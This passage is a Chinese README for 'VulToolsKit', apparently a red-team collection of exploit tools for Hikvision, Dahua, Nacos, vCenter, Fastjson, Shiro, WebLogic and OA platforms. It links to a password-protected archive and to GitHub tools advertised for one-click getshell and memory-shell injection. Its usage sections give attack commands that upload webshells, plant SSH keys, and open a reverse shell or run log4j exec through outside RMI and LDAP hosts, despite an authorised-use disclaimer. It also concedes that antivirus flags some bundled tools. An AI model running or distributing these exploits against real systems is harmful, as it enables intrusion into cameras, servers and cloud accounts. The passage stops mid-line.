├── README.md ├── VulToolsKit-V1.1一把梭漏洞利用工具合集.html └── assets ├── image-20240627092425-33egjal.png ├── image-20240627092641-z11lhhg.png ├── image-20240627092704-luie0j9.png ├── image-20240627093029-rgwih84.png ├── image-20240627093039-hy5mms2.png ├── image-20240627093052-vlaj022.png ├── image-20240627093100-nm5ryus.png ├── image-20240627093105-rs0mp7q.png ├── image-20240627094033-t8q9zy8.png ├── image-20240627094041-c9nfwhn.png ├── image-20240627094050-the5fq1.png ├── image-20240627095322-zf9bpzu.png ├── image-20240627095433-z1d6prl.png ├── image-20240627101405-x3af9e7.png ├── image-20240627102006-4vbn0vg.png ├── image-20240627104833-9sown7s.png ├── image-20240627105040-78fliwh.png ├── image-20240627105705-su49pl9.png ├── image-20240627105833-30qtagk.png ├── image-20240627110852-l8sj81i.png ├── image-20240627111232-o0yu9hz.png ├── image-20240627112005-llx5b02.png ├── image-20240627112211-pznr73j.png ├── image-20240627120159-t5v1a60.png ├── image-20240627135442-l71fy4u.png ├── image-20240627135553-9ru7crz.png ├── image-20240627135620-r0s0fge.png ├── image-20240627140034-p4j08o0.png ├── image-20240627140100-p4fdeel.png ├── image-20240627140431-7i0plqs.png ├── image-20240627140732-5a1mfgs.png ├── image-20240627141452-r6kpkoo.png ├── image-20240627142612-xriy2tx.png ├── image-20240627143837-y5l0gsi.png ├── image-20240627144355-s3e1ix4.png ├── image-20240627144633-2abln9a.png ├── image-20240627145957-zcz22sx.png ├── image-20240627151424-u1j7xhx.png ├── image-20240627153035-qz8pjh6.png ├── image-20240627153943-1ajvqbh.png ├── image-20240627155236-lk8g7s3.png ├── image-20240627155326-pdu5b7r.png ├── image-20240627164850-vfxoylp.png └── image-20240627171913-hl7u95d.png /README.md: -------------------------------------------------------------------------------- 1 | # 目录 2 | 红队武器库VulToolsKit漏洞利用工具合集整理,解压密码:LightDream,欢迎关注公众号:浅梦安全 3 | 4 | V1.1下载链接:(因为文件太大了上传Github不太方便,所以就挂网盘了,) 5 | 6 | 夸克网盘「VulToolsKit漏洞利用工具合集.zip」链接:https://pan.quark.cn/s/59975ef47afa 7 | 8 | 百度网盘VulToolsKit漏洞利用工具合集.zip链接: 关注公众号:浅梦安全回复:VulToolsKitV1.1获取 9 | 10 | ``` 11 | 海康威视Hikvision综合漏洞利用工具 12 | 大华Dahua综合漏洞利用工具 13 | Nacos综合漏洞利用工具 14 | Vcenter综合漏洞利用工具 15 | Fastjson漏洞批量检测工具 16 | Jenkins综合漏洞利用工具 17 | Struts2全版本漏洞检测工具 18 | Thinkphp综合漏洞利用工具 19 | Spring综合漏洞利用工具 20 | Shiro反序列化漏洞综合利用工具 21 | 若依RuoYi综合漏洞利用工具 22 | Xxl-job漏洞利用工具 23 | Jboss综合漏洞利用工具 24 | Weblogic综合漏洞利用工具 25 | Tomcat综合漏洞利用工具 26 | 帆软反序列化漏洞利用工具 27 | 云资产AK-SK利用管理工具 28 | Confluence综合漏洞利用工具 29 | 数据库综合利用工具 30 | DecryptTools综合加解密后渗透工具 31 | 互联网厂商API利用工具 32 | OA综合漏洞利用工具 33 | 综合漏洞利用工具 34 | Jeecg&Jeecg-boot框架漏洞利用工具 35 | ActiveMqRCE漏洞利用工具 36 | Geoserver漏洞利用工具 37 | Jumpserver漏洞利用工具 38 | 禅道漏洞综合利用工具 39 | Java漏洞利用工具 40 | 信息泄露利用工具 41 | Swagger API信息泄露利用工具 42 | Heapdump敏感信息提取工具 43 | .git泄漏利用工具 44 | SVN源代码利用工具 45 | .DS_Store文件泄露利用工具 46 | .cvs源代码泄露利用工具 47 | Webpack:安全检测的扫描工具 48 | ``` 49 | 50 | 51 | ``` 52 | 此合集所有工具都来源于互联网公开收集整理,请勿从事非法测试!!! 53 | 在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。 54 | 利用此工具集而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与原作者及收集者无关。 55 | 该仅供安全人员用于授权测试,请勿非法使用!!! 56 | 除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用本工具集。 57 | 您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。 58 | 59 | 注:工具集有些工具杀软会报毒,请自行判断是否存在后门,收集作者未加入任何后门!!!,建议在本地虚拟机中使用。 60 | ``` 61 | 62 | - 海康威视Hikvision综合漏洞利用工具 63 | - [MInggongK/Hikvision-: Hikvision综合漏洞利用工具 (github.com)](https://github.com/MInggongK/Hikvision-) 64 | - [charonlight/HikvisionExploitGUI: 海康威视漏洞综合利用工具(github.com)](https://github.com/charonlight/HikvisionExploitGUI) 65 | - [jorhelp/Ingram: 网络摄像头漏洞扫描工具  (github.com)](https://github.com/jorhelp/Ingram) 66 | - [Cuerz/CVE-2021-36260: 海康威视RCE漏洞 批量检测和利用工具 (github.com)](https://github.com/Cuerz/CVE-2021-36260) 67 | - [chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor. (github.com)](https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor) 68 | - 大华Dahua综合漏洞利用工具 69 | - [MInggongK/dahuaExploitGUI: dahua综合漏洞利用工具 (github.com)](https://github.com/MInggongK/dahuaExploitGUI) 70 | - [mcw0/DahuaConsole: Dahua Console. (github.com)](https://github.com/mcw0/DahuaConsole) 71 | - Nacos综合漏洞利用工具 72 | - [charonlight/NacosExploitGUI: Nacos漏洞综合利用GUI工具,集成了默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞、反序列化漏洞的检测及其利用 (github.com)](https://github.com/charonlight/NacosExploitGUI) 73 | - [Conan924/NacosExploit: NacosExploit 命令执行 内存马等利用 (github.com)](https://github.com/Conan924/NacosExploit) 74 | - [h0ny/NacosExploit: Nacos 综合利用工具 (github.com)](https://github.com/h0ny/NacosExploit) 75 | - [p1d3er/GitNacosConfig: 一键获取Nacos所有配置文件 (github.com)](https://github.com/p1d3er/GitNacosConfig) 76 | - [HACK-THE-WORLD/nacos-poc (github.com)](https://github.com/HACK-THE-WORLD/nacos-poc) 77 | - Vcenter综合漏洞利用工具 78 | - [W01fh4cker/VcenterKit: Vcenter综合渗透利用工具包 | Vcenter Comprehensive Penetration and Exploitation Toolkit (github.com)](https://github.com/W01fh4cker/VcenterKit) 79 | - [Schira4396/VcenterKiller: 一款针对Vcenter的综合利用工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005、One Access的CVE-2022-22954、CVE-2022-22972/31656以及log4j,提供一键上传webshell,命令执行或者上传公钥使用SSH免密连接 (github.com)](https://github.com/Schira4396/VcenterKiller) 80 | - Fastjson漏洞批量检测工具 81 | - [c0ny1/FastjsonExploit: Fastjson vulnerability quickly exploits the framework(fastjson漏洞快速利用框架) (github.com)](https://github.com/c0ny1/FastjsonExploit) 82 | - [smallfox233/JsonExp: fastjson漏洞批量检测工具 (github.com)](https://github.com/smallfox233/JsonExp) 83 | - Jenkins综合漏洞利用工具 84 | - [TheBeastofwar/JenkinsExploit-GUI: 一款Jenkins的综合漏洞利用工具 (github.com)](https://github.com/TheBeastofwar/JenkinsExploit-GUI) 85 | - [charonlight/JenkinsExploitGUI: Jenkins CLI 任意文件读取漏洞检查工具 (github.com)](https://github.com/charonlight/JenkinsExploitGUI) 86 | - [convisolabs/CVE-2024-43044-jenkins: Exploit for the vulnerability CVE-2024-43044 in Jenkins (github.com)](https://github.com/convisolabs/CVE-2024-43044-jenkins) 87 | - Struts2全版本漏洞检测工具 88 | - [abc123info/Struts2VulsScanTools: 自动检测该URL是否存在S2-001、S2-005、S2-009、S2-013、S2-016、S2-019、S2-020/021、S2-032、S2-037、DevMode、S2-045/046、S2-052、S2-048、S2-053、S2-057、S2-061、S2相关log4j2十余种漏洞。 (github.com)](https://github.com/abc123info/Struts2VulsScanTools) 89 | - [shack2/Struts2VulsTools: Struts2系列漏洞检查工具 (github.com)](https://github.com/shack2/Struts2VulsTools) 90 | - Thinkphp综合漏洞利用工具 91 | - [Lotus6/ThinkphpGUI: Thinkphp(GUI)漏洞利用工具,支持各版本TP漏洞检测,命令执行,getshell。 (github.com)](https://github.com/Lotus6/ThinkphpGUI) 92 | - [bewhale/thinkphp_gui_tools: ThinkPHP漏洞综合利用工具, 图形化界面, 命令执行, 一键getshell, 批量检测, 日志遍历, session包含,宝塔绕过 (github.com)](https://github.com/bewhale/thinkphp_gui_tools) 93 | - [zangcc/Aazhen-RexHa: 漏洞POC基本适用ThinkPHP全版本漏洞。 (github.com)](https://github.com/zangcc/Aazhen-RexHa) 94 | - Spring综合漏洞利用工具 95 | - [charonlight/SpringExploitGUI: 一款Spring综合漏洞的利用工具,工具支持多个Spring相关漏洞的检测以及利用 (github.com)](https://github.com/charonlight/SpringExploitGUI) 96 | - [0x727/SpringBootExploit: 项目是根据LandGrey/SpringBootVulExploit清单编写,目的hvv期间快速利用漏洞、降低漏洞利用门槛。 (github.com)](https://github.com/0x727/SpringBootExploit) 97 | - [SummerSec/SpringExploit: 🚀 一款为了学习go而诞生的漏洞利用工具 (github.com)](https://github.com/SummerSec/SpringExploit) 98 | - [savior-only/Spring_All_Reachable: Spring漏洞综合利用工具 (github.com)](https://github.com/savior-only/Spring_All_Reachable) 99 | - Shiro反序列化漏洞综合利用工具 100 | - [SummerSec/ShiroAttack2: shiro反序列化漏洞综合利用,包含(回显执行命令/注入内存马)修复原版中NoCC的问题 https://github.com/j1anFen/shiro_attack](https://github.com/SummerSec/ShiroAttack2) 101 | - [sma11new/Pyke-Shiro: 复杂请求下的Shiro反序列化利用工具 (github.com)](https://github.com/sma11new/Pyke-Shiro) 102 | - [altEr1125/ShiroAttack2: 一款针对Shiro550漏洞进行快速漏洞利用工具。 对 @SummerSec 大佬的项目https://github.com/SummerSec/ShiroAttack2 进行了一些改进。](https://github.com/altEr1125/ShiroAttack2) 103 | - [safe6Sec/ShiroExp: shiro综合利用工具 (github.com)](https://github.com/safe6Sec/ShiroExp) 104 | - [wyzxxz/shiro_rce_tool: shiro 反序列 命令执行辅助检测工具 (github.com)](https://github.com/wyzxxz/shiro_rce_tool) 105 | - [feihong-cs/ShiroExploit-Deprecated: Shiro550/Shiro721 一键化利用工具,支持多种回显方式 (github.com)](https://github.com/feihong-cs/ShiroExploit-Deprecated) 106 | - 若依RuoYi综合漏洞利用工具 107 | - [若依漏洞综合利用工具 (qq.com)](https://mp.weixin.qq.com/s/HU1OqZ7YFGjfc4HE3M8tPA) 108 | - [charonlight/RuoYiExploitGUI: 若依最新定时任务SQL注入可导致RCE漏洞的一键利用工具 (github.com)](https://github.com/charonlight/RuoYiExploitGUI) 109 | - Xxl-job漏洞利用工具 110 | - [charonlight/xxl-jobExploitGUI: xxl-job最新漏洞利用工具 (github.com)](https://github.com/charonlight/xxl-jobExploitGUI) 111 | - Jboss综合漏洞利用工具 112 | - [https://mp.weixin.qq.com/s/O0sMwNHRZKn4G4uJC55YlQ](https://mp.weixin.qq.com/s/O0sMwNHRZKn4G4uJC55YlQ) 113 | - [https://github.com/fupinglee/JavaTools/tree/master/JBoss](https://github.com/fupinglee/JavaTools/tree/master/JBoss) 114 | - Weblogic综合漏洞利用工具 115 | - [KimJun1010/WeblogicTool: WeblogicTool,GUI漏洞利用工具,支持漏洞检测、命令执行、内存马注入、密码解密等(深信服深蓝实验室天威战队强力驱动) (github.com)](https://github.com/KimJun1010/WeblogicTool) 116 | - Tomcat综合漏洞利用工具 117 | - [tpt11fb/AttackTomcat: Tomcat常见漏洞GUI利用工具。CVE-2017-12615 PUT文件上传漏洞、tomcat-pass-getshell 弱认证部署war包、弱口令爆破、CVE-2020-1938 Tomcat AJP文件读取/包含 (github.com)](https://github.com/tpt11fb/AttackTomcat) 118 | - [errors11/TomcatVuln: Tomcat漏洞利用工具 (github.com)](https://github.com/errors11/TomcatVuln) 119 | - 帆软反序列化漏洞利用工具 120 | - [7wkajk/Frchannel: 帆软bi反序列化漏洞利用工具 (github.com)](https://github.com/7wkajk/Frchannel) 121 | - [BambiZombie/FrchannelPlus: 帆软bi反序列化漏洞利用工具 (github.com)](https://github.com/BambiZombie/FrchannelPlus) 122 | - 云资产AK-SK利用管理工具 123 | - [dark-kingA/cloudTools: 云资产管理工具 目前工具定位是云安全相关工具,目前是两个模块 云存储工具、云服务工具, 云存储工具主要是针对oss存储、查看、删除、上传、下载、预览等等 云服务工具主要是针对rds、服务器的管理,查看、执行命令、接管等等 (github.com)](https://github.com/dark-kingA/cloudTools) 124 | - [jdr2021/OSSFileBrowse: 存储桶遍历漏洞利用工具 (github.com)](https://github.com/jdr2021/OSSFileBrowse) 125 | - [CF 云环境利用框架使用手册 | T Wiki (teamssix.com)](https://wiki.teamssix.com/cf/) 126 | - [mrknow001/aliyun-accesskey-Tools: 阿里云accesskey利用工具 (github.com)](https://github.com/mrknow001/aliyun-accesskey-Tools) 127 | - Confluence综合漏洞利用工具 128 | - [Lotus6/ConfluenceMemshell: Confluence CVE 2021,2022,2023 利用工具,支持命令执行,哥斯拉,冰蝎 内存马注入 (github.com)](https://github.com/Lotus6/ConfluenceMemshell) 129 | - 数据库综合利用工具 130 | - [SafeGroceryStore/MDUT: MDUT - Multiple Database Utilization Tools (github.com)](https://github.com/SafeGroceryStore/MDUT) 131 | - [team-ide/teamide: Team IDE 集成MySql、Oracle、金仓、达梦、神通等数据库、SSH、FTP、Redis、Zookeeper、Kafka、Elasticsearch、Mongodb、小工具等管理工具 (github.com)](https://github.com/team-ide/teamide) 132 | - [r0oth3x49/ghauri: An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws (github.com)](https://github.com/r0oth3x49/ghauri) 133 | - [攻防演练工具 | Oracle数据库getshell的另一种思路 - FreeBuf网络安全行业门户](https://www.freebuf.com/defense/405383.html) 134 | - [DeEpinGh0st/MDUT-Extend-Release: MDUT-Extend(扩展版本) (github.com)](https://github.com/DeEpinGh0st/MDUT-Extend-Release) 135 | - [Release v1.0.7 · 1n7erface/Template (github.com)](https://github.com/1n7erface/Template/releases/tag/v1.0.7) 136 | - [jas502n/oracleShell: oracle 数据库命令执行 (github.com)](https://github.com/jas502n/oracleShell) 137 | - [PostgreUtil数据库利用工具](https://mp.weixin.qq.com/s/0s6CTAjwd5-qN6IxupwC9w) 138 | - DecryptTools综合加解密后渗透工具 139 | - [wafinfo/DecryptTools: DecryptTools-综合解密 (github.com)](https://github.com/wafinfo/DecryptTools) 140 | - 互联网厂商API利用工具 141 | - [pykiller/API-T00L: 互联网厂商API利用工具。 (github.com)](https://github.com/pykiller/API-T00L) 142 | - [mrknow001/API-Explorer: API接口管理工具(目前内置微信公众号、微信小程序、企业微信、飞书、钉钉等) (github.com)](https://github.com/mrknow001/API-Explorer) 143 | - OA综合漏洞利用工具 144 | - [MInggongK/Penetration-mining-src: 一款集成了H3C,致远,泛微,万户,帆软,海康威视,金蝶云星空,畅捷通,Struts等多个RCE漏洞利用工具 (github.com)](https://github.com/MInggongK/Penetration-mining-src) 145 | - [R4gd0ll/I-Wanna-Get-All: OA漏洞利用工具 (github.com)](https://github.com/R4gd0ll/I-Wanna-Get-All) 146 | - [achuna33/MYExploit: OAExploit一款基于产品的一键扫描工具。 (github.com)](https://github.com/achuna33/MYExploit) 147 | - [琴音安全红蓝对抗重点OA系统漏洞利用工具](https://mp.weixin.qq.com/s/1MEkYv5A47DJLCKqXKT0zQ) 148 | - [xiaokp7/TongdaOATool: 通达OA漏洞检测工具 (github.com)](https://github.com/xiaokp7/TongdaOATool) 149 | - [cseroad/Exp-Tools: 一款集成高危漏洞exp的实用性工具 (github.com)](https://github.com/cseroad/Exp-Tools) 150 | - [wgpsec/YongYouNcTool: 用友NC系列漏洞检测利用工具,支持一键检测、命令执行回显、文件落地、一键打入内存马、文件读取等 (github.com)](https://github.com/wgpsec/YongYouNcTool) 151 | - [Chave0v0/YONYOU-TOOL: 用友漏洞综合利用工具 (github.com)](https://github.com/Chave0v0/YONYOU-TOOL) 152 | - [White-hua/Apt_t00ls: 高危漏洞利用工具 (github.com)](https://github.com/White-hua/Apt_t00ls) 153 | - [ExpLangcn/HVVExploitApply: 遵守规章制度关闭项目-使用JAVAFX图形化界面检测对HVV中常见的重点CMS系统和OA系统的已公开的漏洞进行验证。 (github.com)](https://github.com/ExpLangcn/HVVExploitApply) 154 | - [lijiaxing1997/Gr33k: 图形化漏洞利用集成工具 (github.com)](https://github.com/lijiaxing1997/Gr33k) 155 | - 综合漏洞利用工具 156 | - [pureqh/Hyacinth: 一款java漏洞集合工具 (github.com)](https://github.com/pureqh/Hyacinth) 157 | - [qianxiao996/FrameScan-GUI: FrameScan-GUI 一款python3和Pyqt编写的具有图形化界面的cms漏洞检测框架。 (github.com)](https://github.com/qianxiao996/FrameScan-GUI) 158 | - [f0ng/poc2jar: Java编写,Python作为辅助依赖的漏洞验证、利用工具,添加了进程查找模块、编码模块、命令模块、常见漏洞利用GUI模块、shiro rememberMe解密模块,加快测试效率 (github.com)](https://github.com/f0ng/poc2jar) 159 | - [Liqunkit/LiqunKit_: 下架 (github.com)](https://github.com/Liqunkit/LiqunKit_) 160 | - Jeecg&Jeecg-boot框架漏洞利用工具 161 | - [K-7H7l/Jeecg_Tools: 本工具为jeecg框架漏洞利用工具非jeecg-boot! (github.com)](https://github.com/K-7H7l/Jeecg_Tools) 162 | - [MInggongK/jeecg-: jeecg综合漏洞利用工具 (github.com)](https://github.com/MInggongK/jeecg-) 163 | - ActiveMqRCE漏洞利用工具 164 | - [Hutt0n0/ActiveMqRCE: 用java实现构造openwire协议,利用activeMQ < 5.18.3 RCE 回显利用 内存马注入 (github.com)](https://github.com/Hutt0n0/ActiveMqRCE) 165 | - Geoserver漏洞利用工具 166 | - [GeoServer 综合漏洞扫描工具V1.2 发布! (qq.com)](https://mp.weixin.qq.com/s/2MjsLXM8wXRRl1PhXOfAig) 167 | - Jumpserver漏洞利用工具 168 | - [tarihub/blackjump: JumpServer 堡垒机未授权综合漏洞利用, Exploit for CVE-2023-42442 / CVE-2023-42820 / RCE 2021 (github.com)](https://github.com/tarihub/blackjump) 169 | - 禅道漏洞综合利用工具 170 | - [charonlight/ZentaoExploitGUI: 禅道最新身份认证绕过漏洞利用工具 (github.com)](https://github.com/charonlight/ZentaoExploitGUI) 171 | - Java漏洞利用工具 172 | - [welk1n/JNDI-Injection-Exploit: JNDI注入测试工具(github.com)](https://github.com/welk1n/JNDI-Injection-Exploit) 173 | - [qi4L/JYso: It can be either a JNDIExploit or a ysoserial. (github.com)](https://github.com/qi4L/JYso) 174 | - [cckuailong/JNDI-Injection-Exploit-Plus: 80+ Gadgets(30 More than ysoserial). 一款JNDI注入利用工具,可以生成JNDI链接并启动后端相关服务。. (github.com)](https://github.com/cckuailong/JNDI-Injection-Exploit-Plus?tab=readme-ov-file) 175 | - [frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. (github.com)](https://github.com/frohoff/ysoserial) 176 | - [Y4er/ysoserial: ysoserial修改版,着重修改ysoserial.payloads.util.Gadgets.createTemplatesImpl使其可以通过引入自定义class的形式来执行命令、内存马、反序列化回显。 (github.com)](https://github.com/Y4er/ysoserial) 177 | - [frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. (github.com)](https://github.com/frohoff/ysoserial) 178 | - 信息泄露利用工具 179 | - Swagger API信息泄露利用工具 180 | - [jayus0821/swagger-hack: 自动化爬取并自动测试所有swagger接口 (github.com)](https://github.com/jayus0821/swagger-hack) 181 | - [lijiejie/swagger-exp: A Swagger API Exploit (github.com)](https://github.com/lijiejie/swagger-exp) 182 | - Heapdump敏感信息提取工具 183 | - [wyzxxz/heapdump_tool: heapdump敏感信息查询工具,例如查找 spring heapdump中的密码明文,AK,SK等 (github.com)](https://github.com/wyzxxz/heapdump_tool) 184 | - [whwlsfb/JDumpSpider: HeapDump敏感信息提取工具 (github.com)](https://github.com/whwlsfb/JDumpSpider) 185 | - .git泄漏利用工具 186 | - [BugScanTeam/GitHack: .git 泄漏利用工具,可还原历史版本 (github.com)](https://github.com/BugScanTeam/GitHack) 187 | - SVN源代码利用工具 188 | - [admintony/svnExploit: SvnExploit支持SVN源代码泄露全版本Dump源码 (github.com)](https://github.com/admintony/svnExploit) 189 | - .DS_Store文件泄露利用工具 190 | - [lijiejie/ds_store_exp: A .DS_Store file disclosure exploit. It parses .DS_Store file and downloads files recursively. (github.com)](https://github.com/lijiejie/ds_store_exp) 191 | - .cvs源代码泄露利用工具 192 | - [kost/dvcs-ripper: Rip web accessible (distributed) version control systems: SVN/GIT/HG... (github.com)](https://github.com/kost/dvcs-ripper) 193 | - Webpack:安全检测的扫描工具 194 | - [zangcc/Aakian-FaCai: 基于前端vue框架的JavaFx图形化GUI漏洞扫描工具。 (github.com)](https://github.com/zangcc/Aakian-FaCai) 195 | - [rtcatc/Packer-Fuzzer: Packer Fuzzer is a fast and efficient scanner for security detection of websites constructed by javascript module bundler such as Webpack. (github.com)](https://github.com/rtcatc/Packer-Fuzzer) 196 | 197 | # 海康威视 Hikvision 综合漏洞利用工具 198 | 199 | ## 项目地址 200 | 201 | ``` 202 | https://github.com/MInggongK/Hikvision- 203 | ``` 204 | 205 | ## 项目介绍 206 | 207 | ``` 208 | 海康威视综合漏洞利用工具 收录漏洞如下: 209 | Hikvision 摄像头未授权访问漏洞 210 | Hikvision 远程代码执行漏洞 211 | Hikvision iVMS综合安防系统任意文件上传漏洞 212 | Hikvision综合安防管理平台isecure center文件上传漏洞 213 | Hikvision综合安防管理平台config信息泄露漏洞 214 | Hikvision综合安防管理平台env信息泄漏漏洞 215 | Hikvision综合安防管理平台report任意文件上传漏洞 216 | Hikvision综合安防管理平台api session命令执行漏洞 217 | Hikvision applyCT命令执行漏洞 218 | Hikvision applyAutoLoginTicket命令执行漏洞 219 | Hikvision keepAlive远程代码执行漏洞 220 | Hikvision综合安防管理平台orgManage任意文件读取漏洞 221 | Hikvision综合安防管理平台files任意文件读取漏洞 222 | ``` 223 | 224 | ![image](assets/image-20240627092425-33egjal.png) 225 | 226 | # Dahua 综合漏洞利用工具 227 | 228 | ## 项目地址 229 | 230 | ``` 231 | https://github.com/MInggongK/dahuaExploitGUI 232 | ``` 233 | 234 | ## 项目介绍 235 | 236 | ``` 237 | Dhua综合漏洞利用工具 收录漏洞如下: 238 | 239 | 大华DSS数字监控系统attachment_clearTempFile.action注入漏洞 240 | 大华DSS数字监控系统远程命令执行漏洞 241 | 大华DSS数字监控系统itcBulletin注入漏洞 242 | 大华智慧园区综合管理平台信息泄露漏洞 243 | 大华智慧园区综合管理平台getNewStaypointDetailQuery注入漏洞 244 | 大华智慧园区综合管理平台clientserver注入 245 | 大华DSS user_edit.action信息泄露漏洞 246 | 大华智慧园区综合管理平台poi任意文件上传漏洞 247 | 大华智慧园区综合管理平台video任意文件上传漏洞 248 | 大华智慧园区综合管理平台emap任意文件上传漏洞 249 | 大华智慧园区综合管理平台searchJson注入漏洞 250 | 大华DSS数字监控系统attachment_getAttList.action注入漏洞 251 | 大华智能物联综合管理平台justForTest用户登录漏洞 252 | 大华智慧园区综合管理平台sendFaceInfo远程命令执行漏洞 253 | 大华智慧园区综合管理平台deleteFtp远程命令执行漏洞 254 | 大华EIMS-capture_handle远程命令执行漏洞 255 | 大华智能物联综合管理平台random远程命令执行漏洞 256 | 大华智慧园区综合管理平台ipms命令执行漏洞 257 | ``` 258 | 259 | ![image](assets/image-20240627092641-z11lhhg.png) 260 | 261 | ![image](assets/image-20240627092704-luie0j9.png) 262 | 263 | # Nacos 综合漏洞利用工具 264 | 265 | ## 项目地址 266 | 267 | ``` 268 | https://github.com/charonlight/NacosExploitGUI 269 | ``` 270 | 271 | ## 项目介绍 272 | 273 | ``` 274 | 集成了默认口令漏洞、SQL注入漏洞、身份认证绕过漏洞、反序列化漏洞的检测及其利用 275 | ``` 276 | 277 | ![image](assets/image-20240627093029-rgwih84.png) 278 | 279 | ![image](assets/image-20240627093039-hy5mms2.png) 280 | 281 | ![image](assets/image-20240627093052-vlaj022.png) 282 | 283 | ![image](assets/image-20240627093100-nm5ryus.png) 284 | 285 | ![image](assets/image-20240627093105-rs0mp7q.png) 286 | 287 | # Vcenter 综合漏洞利用工具 288 | 289 | ## 项目地址 290 | 291 | ``` 292 | https://github.com/Schira4396/VcenterKiller 293 | ``` 294 | 295 | ``` 296 | https://github.com/W01fh4cker/VcenterKit 297 | ``` 298 | 299 | ## 项目介绍 300 | 301 | ``` 302 | 一款针对Vcenter的综合利用工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005、One Access的CVE-2022-22954、CVE-2022-22972/31656以及log4j,提供一键上传webshell,命令执行或者上传公钥使用SSH免密连接 303 | 304 | go build -o main.exe 305 | 306 | ./main.exe -u https://192.168.1.1 -m 21985 -c whoami 307 | ./main.exe -u https://192.168.1.1 -m 22005 -f test.jsp 308 | ./main.exe -u https://192.168.1.1 -m 21972 -f test.jsp 309 | ./main.exe -u https://192.168.1.1 -m 21972 -f id_rsa.pub -t ssh //传公钥 310 | ./main.exe -u https://192.168.1.1 -m 21985 -t rshell -r rmi://xx.xx.xx.xx:1099/xx 311 | ./main.exe -u https://192.168.1.1 -m log4center -t scan // scan log4j 312 | ./main.exe -u https://192.168.1.1 -m log4center -t exec -r ldap://xx.xx.xx.xx:1389 -c whoami //也可以不指定ldap服务 313 | ./main.exe -u https://xx.xx.com -m 22954 whoami 314 | ./main.exe -u https://xx.xx.com -m 22972 //get cookie 315 | ./main.exe -u https://xx.xx.com -m 31656 //If CVE-2022-22972不能用就换CVE-2022-31656 316 | ``` 317 | 318 | ``` 319 | Vcenter综合渗透利用工具包 | Vcenter Comprehensive Penetration and Exploitation Toolkit包含 320 | 321 | 信息收集模块 322 | CVE-2021-21972模块 323 | CVE-2021-21985模块 324 | CVE-2021-22005模块 325 | CVE-2022-22954模块 326 | CVE-2022-22972模块 327 | 后渗透利用模块 328 | 渗透测试记事本(打vcenter的时候常用的命令、常看的文章) 329 | ``` 330 | 331 | ![image](assets/image-20240627094033-t8q9zy8.png) 332 | 333 | ![image](assets/image-20240627094041-c9nfwhn.png) 334 | 335 | ![image](assets/image-20240627094050-the5fq1.png) 336 | 337 | # Fastjson 漏洞批量检测工具 338 | 339 | ## 项目地址 340 | 341 | ``` 342 | https://github.com/c0ny1/FastjsonExploit 343 | ``` 344 | 345 | ``` 346 | https://github.com/smallfox233/JsonExp 347 | ``` 348 | 349 | ## 项目介绍 350 | 351 | ``` 352 | FastjsonExploit是一个Fastjson漏洞快速漏洞利用框架,主要功能如下: 353 | 354 | 一键生成利用payload,并启动所有利用环境。 355 | 管理Fastjson各种payload(当然是立志整理所有啦,目前6个类,共11种利用及绕过) 356 | 357 | 358 | .---- -. -. . . . 359 | ( .',----- - - ' ' 360 | \_/ ;--:-\ __--------------------__ 361 | __U__n_^_''__[. |ooo___ | |_!_||_!_||_!_||_!_| | 362 | c(_ ..(_ ..(_ ..( /,,,,,,] | |___||___||___||___| | 363 | ,_\___________'_|,L______],|______________________| 364 | /;_(@)(@)==(@)(@) (o)(o) (o)^(o)--(o)^(o) 365 | 366 | FastjsonExploit is a Fastjson library vulnerability exploit framework 367 | Author:c0ny1 368 | 369 | 370 | Usage: java -jar Fastjson-[version]-all.jar [payload] [option] [command] 371 | Exp01: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 rmi://127.0.0.1:1099/Exploit "cmd:calc" 372 | Exp02: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 ldap://127.0.0.1:1232/Exploit "code:custom_code.java" 373 | Exp03: java -jar FastjsonExploit-[version].jar TemplatesImpl1 "cmd:calc" 374 | Exp04: java -jar FastjsonExploit-[version].jar TemplatesImpl1 "code:custom_code.java" 375 | 376 | Available payload types: 377 | Payload PayloadType VulVersion Dependencies 378 | ------- ----------- ---------- ------------ 379 | BasicDataSource1 local 1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4 380 | BasicDataSource2 local 1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4 381 | JdbcRowSetImpl1 jndi 1.2.2.1-1.2.2.4 382 | JdbcRowSetImpl2 jndi 1.2.2.1-1.2.4.1 Fastjson 1.2.41 bypass 383 | JdbcRowSetImpl3 jndi 1.2.2.1-1.2.4.3 Fastjson 1.2.43 bypass 384 | JdbcRowSetImpl4 jndi 1.2.2.1-1.2.4.2 Fastjson 1.2.42 bypass 385 | JdbcRowSetImpl5 jndi 1.2.2.1-1.2.4.7 Fastjson 1.2.47 bypass 386 | JndiDataSourceFactory1 jndi 1.2.2.1-1.2.2.4 ibatis-core:3.0 387 | SimpleJndiBeanFactory1 jndi 1.2.2.2-1.2.2.4 spring-context:4.3.7.RELEASE 388 | TemplatesImpl1 local 1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField) 389 | TemplatesImpl2 local 1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField) 390 | ``` 391 | 392 | ``` 393 | 1. 根据现有payload,检测目标是否存在fastjson或jackson漏洞(工具仅用于检测漏洞、定位payload) 394 | 2. 若存在漏洞,可根据对应payload进行后渗透利用 395 | 3. 若出现新的漏洞时,可将最新的payload新增至txt中(需修改格式) 396 | 4. 工具无法完全替代手工检测,仅作为辅助工具使用 397 | JsonExp.exe -h 398 | usage: -u [目标] -l [LDAP地址] 399 | usage: -uf [url.txt] -l [LDAP地址] 400 | usage: -req [request.txt] -l [LDAP地址] 401 | 402 | [-h] [-uf URLFILE] [-u URL] [-req REQUEST] [-to TIMEOUT] [-f 